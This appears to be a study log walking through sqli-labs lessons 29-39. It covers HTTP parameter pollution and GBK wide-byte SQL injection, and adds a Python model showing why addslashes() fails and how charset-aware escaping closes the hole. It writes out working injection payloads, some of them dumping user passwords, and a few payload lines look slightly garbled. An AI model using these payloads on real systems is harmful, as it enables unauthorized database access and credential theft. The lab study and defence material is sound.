Less 29-31 require Tomcat to be installed; I did not get the experiment to work. The principle is HTTP parameter pollution: with index.php?id=1&id=2, the value that actually reaches the back-end system is id=2, so id=1 is what satisfies the filter while id=2 carries the injected SQL statement. The payloads are attached for reference:
Less29:id=1&id=-2 ' Union Select, (select Group_concat (Id,0x7c,username,0x7c,password) from Security.users)--+
Less30:id=1&id=-2 "Union Select, (select Group_concat (Id,0x7c,username,0x7c,password) from Security.users)--+
LESS31:ID=1&ID=-2) Union Select, (select Group_concat (Id,0x7c,username,0x7c,password) from Security.users)--+
Less 32-38 are the same type of challenge: the code turns ' into \'. The solution is wide-byte injection. A wide byte here means that MySQL, when using the GBK encoding, treats two bytes (AB) as one Chinese character, provided the first byte A has a code greater than 128. The evolution is as follows:
' becomes \', i.e. %27 becomes %5c%27. When we construct the payload, placing %df in front of %5c makes %df%5c one wide character, which neutralizes the \ so that the injection can succeed.
Less32:192.168.162.135/sqli-libs/less-32/?id=-1%df%27union Select 1,@ @version, 3--+
Less33:192.168.162.135/sqli-libs/less-33/?id=-1%df%27union Select 1,@ @version, 3--+
Less34:uname=admin%df%27union Select 1,database () #&passwd=1&submit=submit
Less35:192.168.162.135/sqli-libs/less-35/?id=-1 Union Select 1,@ @version, 3--+
Less36:192.168.162.135/sqli-libs/less-36/?id=-1%df%27union Select 1,@ @version, 3--+
Less37:uname=admin%df%27union Select 1,database () #&passwd=1&submit=submit
Less38:192.168.162.135/sqli-libs/less-38/?id=-1%df%27union Select 1,@ @version, 3--+
Less39:192.168.162.135/sqli-libs/less-39/?id=-1 Union Select 1,@ @version, 3--+
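Why the filter in Less 32-38 fails and what a charset-aware escaper does differently, as an added Python model (not code from this post or from sqli-labs): addslashes() escapes byte by byte, so the escaped 0xdf 0x5c pair is read back as one GBK character and the quote behind it survives, whereas an escaper that knows the connection charset (as mysql_real_escape_string() does after mysqli_set_charset('gbk')) escapes the stray lead byte as well. The lexer and escaper below are simplified models of MySQL's behaviour, not its code; setting the charset through the client API, or better, using prepared statements, is the fix this models.

```python
# Constructed sample: the %df%27 sequence from the payloads above, URL-decoded.
WIDE_BYTE_INPUT = b"\xdf'"

def gbk_char_len(data: bytes, i: int) -> int:
    """2 if data[i:i+2] is a complete two-byte GBK character, else 1."""
    lead_ok = 0x81 <= data[i] <= 0xFE
    trail_ok = i + 1 < len(data) and 0x40 <= data[i + 1] <= 0xFE and data[i + 1] != 0x7F
    return 2 if lead_ok and trail_ok else 1

def addslashes_bytewise(data: bytes) -> bytes:
    """PHP addslashes(): charset-unaware, a backslash before ' " \\ and NUL, byte by byte."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def escape_gbk_aware(data: bytes) -> bytes:
    """Model of mysql_real_escape_string() after mysqli_set_charset('gbk'): a complete
    two-byte character is copied untouched, a lone byte that merely looks like a lead
    byte is itself escaped (so it cannot later pair with a backslash), metas get \\."""
    out, i = bytearray(), 0
    while i < len(data):
        n = gbk_char_len(data, i)
        if n == 1 and (0x81 <= data[i] <= 0xFE or data[i] in (0x27, 0x22, 0x5C, 0x00)):
            out.append(0x5C)
        out += data[i:i + n]
        i += n
    return bytes(out)

def breaks_out_of_literal(escaped: bytes) -> bool:
    """Scan like MySQL's lexer reading the body of a '...' literal under GBK: a valid
    two-byte character is consumed whole, a backslash consumes exactly one following
    byte, a bare ' closes the literal. True means user bytes closed the literal early."""
    i = 0
    while i < len(escaped):
        n = gbk_char_len(escaped, i)
        if n == 1 and escaped[i] == 0x5C:
            n = 2
        elif n == 1 and escaped[i] == 0x27:
            return True
        i += n
    return False

def compare(data: bytes = WIDE_BYTE_INPUT) -> dict:
    """Same input through both escapers: only the charset-aware one keeps the literal closed."""
    return {"addslashes": breaks_out_of_literal(addslashes_bytewise(data)),
            "gbk_aware": breaks_out_of_literal(escape_gbk_aware(data))}
```

compare() returns {'addslashes': True, 'gbk_aware': False} for the sample input: the byte-wise escape lets the quote close the literal, the charset-aware one does not.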
"20171102 morning" sqli-libs less 29-39